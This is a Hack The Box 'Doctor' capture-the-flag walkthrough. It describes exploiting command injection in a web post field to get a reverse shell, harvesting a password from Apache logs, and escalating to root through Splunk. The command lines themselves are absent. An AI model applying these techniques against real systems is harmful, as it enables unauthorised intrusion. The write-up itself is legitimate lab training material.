Hack The Box - Doctor Walkthrough without Metasploit
Enumeration
We start by running nmapAutomator script to scan the target:
The Basic Nmap Scan returns the following:
Ports
We have the following Ports open
22, 80, 8089
22
This is the SSH (Secure Shell) port, we might be able to use it later to log in if we find any valid username and its password or its rsa key.
80
This is commonly used for Hypertext Transfer Protocol (HTTP), and as always when we face any http port, we run Gobuster on it:
We didn't find much, but if we go to the page itself and do some manual recon, we will see this:
Let's add doctors.htb to our /etc/hosts and perform that Gobuster scan again:
We found some very interesting results now, among them login
We don't have any credentials yet to log in, but we can Register on this Doctor Secure Messaging page.
Now that we are registered, we can log in with our e-mail and password:
Once we are in, we can see two things, our Profile, and Posts:
We try to create a test post with both title and content as test:
Now let's intercept it with Burp and see if we can play with a post creation:
We intercept it and send it to the Repeater so we can start making some tests with title or content
Exploitation
We are going to try and exploit either title or content in order to gain access to the box
Foothold
Since we have both title and content to play with, we will try to make a simple request on the content:
First, we prepare a http server in our kali:
So, we tried to simply make a wget on the content field and for our surprise... it gets executed! What will happen if instead of a wget to retrieve a test file we try to execute some other thing.
After playing with some bash payloads and nc we decided to try out nc.traditional:
$IFS is just a way in bash to indicate a blank space
We could also gain a reverse shell with:
or
Now we update our shell with python to a tty shell:
Internal Enumeration
As soon as we get in, we saw that we belong to an interesting group adm:
We can see there are two users in /home
So, our primary target now it's Shaun, as we belong to adm group we can take a look at apache2 logs:
Let's see if there's any password we can grab from there:
Along with all the dirt created by gobuster (hehe) we found some interesting thing:
Since we found a possible password the first thing, we have to do is to try Password-Spreading (basically test it with all the possible users)
We tried root first (you never know...) but it was not as easy as that, we got Shaun instead. We can grab our user flag from his home directory.
Privilege Escalation
At the start of the Enumeration we saw there was another port open with a service Splunk running, a quick google search about that gave us a privilege escalation python script:
Remote Privilege Escalation
Since we have the port 8089 open, we can try the remote version of the python script:
Internal Privilege Escalation
In the case that we could not access the port we can still escalate privileges with the local method, it doesn't work out of the box, on the victim we have python3 and the script was coded in python2, since it has methods such as raw_input() and print without (), we have to change:
raw_input() --> input()
And every print has to be enclosed with ()
Once we have made those changes it works like a charm sending a reverse shell:
Pwnd
We can grab our root flag:
Last updated
